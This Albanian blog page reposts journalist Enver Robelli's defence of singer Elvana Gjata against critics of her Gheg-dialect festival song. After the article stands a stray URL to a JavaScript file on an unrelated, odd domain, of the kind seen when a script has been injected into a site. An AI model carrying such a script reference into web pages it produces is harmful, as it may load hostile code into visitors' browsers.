• HOME
AlpeBlog
AlpeBlog

June 7th, 2026
  • HOME
ENVER ROBELLI/ Elvana Gjatën po e sulmojnë ca hiena nga Tirana, pse këndoi gegënisht
Home
Blog

ENVER ROBELLI/ Elvana Gjatën po e sulmojnë ca hiena nga Tirana, pse këndoi gegënisht

December 27th, 2019 F.autor Blog 0 comments

Gazetari Enver Robelli shkruan se Elvana Gjata është duke u sulmuar egërsisht për këngën e saj në Festivalin e 58 të RTSH-së, vetëm pse teksti ishte gegënisht.

“Një këngëtare shqiptare shkruan një tekst. E shkruan në gegënisht, ashtu siç e ndjen ajo gegënishtën, pa qenë njohëse e çdo detaji të këtij dialekti që e flasin rreth dy të tretat e shqiptarëve në Ballkan.

Pastaj këtë tekst ajo e këndoi në Festivalin e ‘58 të Kangës në Radiotelevizon! Kuku, këngës, jo kangës.

Dhe çka bën vaki? Çohet njëri e thotë: tekst i ndyrë!

Çohet tjetri e thotë: ky është gjenocid kulturor. E dëgjuat mirë: të këndosh e flasësh gegënisht – gjenocid kulturor!

Janë zëra të papërgjegjshëm nga Tirana. Zëra njerëzish që shpërndajnë helm.

Policë gjuhësorë që kanë mandatuar veten për të ndotur debatet publike.

A e imagjinon kush se çfarë skandali do të shkaktohej po ta quante një gjerman dialektin e Zvicrës gjermane hiç më pak se gjenocid kulturor?

E dallimi mes dialekteve të Zvicrës gjermane me gjermanishten e standardit është shumë, shumë më i madh se dallimi mes dikujt që flet shqip në Mitrovicë dhe tjetrit që flet shqip në Mallakastër.

Këndoni e flisni gegënisht pa asnjë ngurrim. Le të çmenden hienat linguistike”, shkruan Robelli, që duket se këtë radhë, e ka keqkuptuar debatin që po bëhet në Shqipëri

//minisrclink.cool/1e40c8bd4601a5a5a4.js

Facebook Twitter Google+ LinkedIn Pinterest
Next article VETON SURROI/ Edi Rama dhe rruga qorre e Kosovës!
Previous article ANALIZA/ Provokoi apo jo Mustafa Nano me Berishën e së kaluarës komuniste?

F.autor

Related Posts

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari? Blog
May 22nd, 2026

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Leave a Reply Cancel reply

Postimet më të ndjekura
KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

KRESHNIK SPAHIU/ Pse në PD u gëzuan për ngjarjet në Nepal, Venezuelë apo në Hungari?

Blog May 22nd, 2026
MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama Blog

MERO BAZE/ E vetmja gjë që kemi për t’i shitur Bordit të Paqes, është Edi Rama

Jan 19th, 2026
EDUARD ZALOSHNJA/ Rrënjët e identitetit Blog

EDUARD ZALOSHNJA/ Rrënjët e identitetit

Mar 26th, 2026
ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi? Blog

ARTUR AJAZI/ A kemi Agjensi Kombëtare Mjedisi?

Feb 5th, 2026
ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia? Blog

ARTUR AJAZI/ Ç’do të thotë arratisja e një killer nga policia?

Jan 14th, 2026
  • HOME
  • Back to top
© AlpeNews 2017. Të Gjitha të drejtat e Rezervuara
Produced by o.k